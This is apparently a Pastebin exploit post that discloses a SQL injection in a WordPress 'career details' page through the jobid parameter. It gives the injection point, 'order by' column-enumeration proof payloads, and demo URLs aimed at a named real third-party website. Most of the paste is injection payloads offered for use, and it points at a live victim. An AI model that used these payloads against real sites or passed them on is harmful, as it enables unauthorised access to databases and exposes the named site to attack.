Advertisement
Kyfx

Thread Modes Wordpress career details Sql Injection Vulnerab

Jul 3rd, 2015
369
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.73 KB | None | 0 0
  1. # [+] VULNERABILITY:
  2.  
  3. #
  4.  
  5. # Wordpress career Details Sql Injection Vulnerability
  6.  
  7. #
  8.  
  9. #######################################################
  10.  
  11. #
  12.  
  13. # [+] Exploit:
  14.  
  15. #
  16.  
  17. #http://localhost/[path]/career-details/?jobid=[ID]'[Sql Injection]
  18.  
  19. #
  20.  
  21. #######################################################
  22.  
  23. #
  24.  
  25. # [+] Proof:
  26.  
  27. #
  28.  
  29. #http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
  30.  
  31. #http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
  32.  
  33. #
  34.  
  35. #######################################################
  36.  
  37. #
  38.  
  39. # [+] Demo:
  40.  
  41. #
  42.  
  43. #http://pragmasys.in/career-details-2/?jobid=7
  44.  
  45. #
  46.  
  47. #http://pragmasys.in/career-details-2/?jobid=7%27
  48.  
  49. #
  50.  
  51. #
  52.  
  53. #######################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement